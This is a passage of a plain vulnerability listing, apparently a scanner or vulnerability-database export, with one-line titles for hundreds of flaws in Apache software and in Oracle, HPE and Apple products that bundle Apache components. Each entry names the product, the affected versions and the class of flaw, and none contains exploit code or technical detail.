3921| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
3922| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
3923| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
3924| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
3925| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUpload denial of service
3926| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
3927| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
3928| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
3929| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
3930| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
3931| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
3932| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
3933| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
3934| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
3935| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
3936| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
3937| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
3938| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
3939| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
3940| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
3941| [103690] Apache OpenMeetings 1.0.0 sql injection
3942| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
3943| [103688] Apache OpenMeetings 1.0.0 weak encryption
3944| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
3945| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
3946| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
3947| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
3948| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
3949| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
3950| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
3951| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
3952| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
3953| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
3954| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
3955| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
3956| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
3957| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
3958| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
3959| [103352] Apache Solr Node weak authentication
3960| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
3961| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
3962| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
3963| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
3964| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
3965| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
3966| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
3967| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
3968| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
3969| [102536] Apache Ranger up to 0.6 Stored cross site scripting
3970| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
3971| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
3972| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
3973| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
3974| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
3975| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
3976| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
3977| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
3978| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
3979| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
3980| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
3981| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
3982| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
3983| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
3984| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
3985| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
3986| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
3987| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
3988| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
3989| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
3990| [99937] Apache Batik up to 1.8 privilege escalation
3991| [99936] Apache FOP up to 2.1 privilege escalation
3992| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
3993| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
3994| [99930] Apache Traffic Server up to 6.2.0 denial of service
3995| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
3996| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
3997| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
3998| [117569] Apache Hadoop up to 2.7.3 privilege escalation
3999| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
4000| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
4001| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
4002| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
4003| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
4004| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
4005| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
4006| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
4007| [99014] Apache Camel Jackson/JacksonXML privilege escalation
4008| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
4009| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
4010| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
4011| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
4012| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
4013| [98605] Apple macOS up to 10.12.3 Apache denial of service
4014| [98604] Apple macOS up to 10.12.3 Apache denial of service
4015| [98603] Apple macOS up to 10.12.3 Apache denial of service
4016| [98602] Apple macOS up to 10.12.3 Apache denial of service
4017| [98601] Apple macOS up to 10.12.3 Apache denial of service
4018| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
4019| [98405] Apache Hadoop up to 0.23.10 privilege escalation
4020| [98199] Apache Camel Validation XML External Entity
4021| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
4022| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
4023| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
4024| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
4025| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
4026| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
4027| [97081] Apache Tomcat HTTPS Request denial of service
4028| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
4029| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
4030| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
4031| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
4032| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
4033| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
4034| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
4035| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
4036| [95311] Apache Storm UI Daemon privilege escalation
4037| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
4038| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
4039| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
4040| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
4041| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
4042| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
4043| [94540] Apache Tika 1.9 tika-server File information disclosure
4044| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
4045| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
4046| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
4047| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
4048| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
4049| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
4050| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4051| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4052| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
4053| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
4054| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
4055| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
4056| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
4057| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
4058| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4059| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4060| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
4061| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
4062| [93532] Apache Commons Collections Library Java privilege escalation
4063| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
4064| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
4065| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
4066| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
4067| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
4068| [93098] Apache Commons FileUpload privilege escalation
4069| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
4070| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
4071| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
4072| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
4073| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
4074| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
4075| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
4076| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
4077| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
4078| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
4079| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
4080| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
4081| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
4082| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
4083| [92549] Apache Tomcat on Red Hat privilege escalation
4084| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
4085| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
4086| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
4087| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
4088| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
4089| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
4090| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
4091| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
4092| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
4093| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
4094| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
4095| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
4096| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
4097| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
4098| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
4099| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
4100| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
4101| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
4102| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
4103| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
4104| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
4105| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
4106| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
4107| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
4108| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
4109| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
4110| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
4111| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
4112| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
4113| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
4114| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
4115| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
4116| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
4117| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
4118| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
4119| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
4120| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
4121| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
4122| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
4123| [90263] Apache Archiva Header denial of service
4124| [90262] Apache Archiva Deserialize privilege escalation
4125| [90261] Apache Archiva XML DTD Connection privilege escalation
4126| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
4127| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
4128| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
4129| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
4130| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
4131| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
4132| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
4133| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
4134| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
4135| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
4136| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
4137| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
4138| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
4139| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
4140| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
4141| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
4142| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
4143| [87765] Apache James Server 2.3.2 Command privilege escalation
4144| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
4145| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
4146| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
4147| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
4148| [87703] Apache Qpid Java up to 6.0.2 PlainSaslServer.java denial of service
4149| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
4150| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
4151| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
4152| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
4153| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4154| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4155| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
4156| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
4157| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
4158| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4159| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4160| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
4161| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
4162| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
4163| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
4164| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
4165| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
4166| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
4167| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
4168| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
4169| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
4170| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
4171| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
4172| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
4173| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
4174| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
4175| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
4176| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
4177| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
4178| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
4179| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
4180| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
4181| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
4182| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
4183| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
4184| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
4185| [82076] Apache Ranger up to 0.5.1 privilege escalation
4186| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
4187| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
4188| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
4189| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
4190| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
| [79791] Cisco Products Apache Commons Collections Library privilege escalation
| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
| [78989] Apache Ambari up to 2.1.1 Open Redirect
| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
| [78987] Apache Ambari up to 2.0.x cross site scripting
| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
| [77406] Apache Flex BlazeDS AMF Message XML External Entity
| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
| [76567] Apache Struts 2.3.20 unknown vulnerability
| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
| [74793] Apache Tomcat File Upload denial of service
| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
| [74468] Apache Batik up to 1.6 denial of service
| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
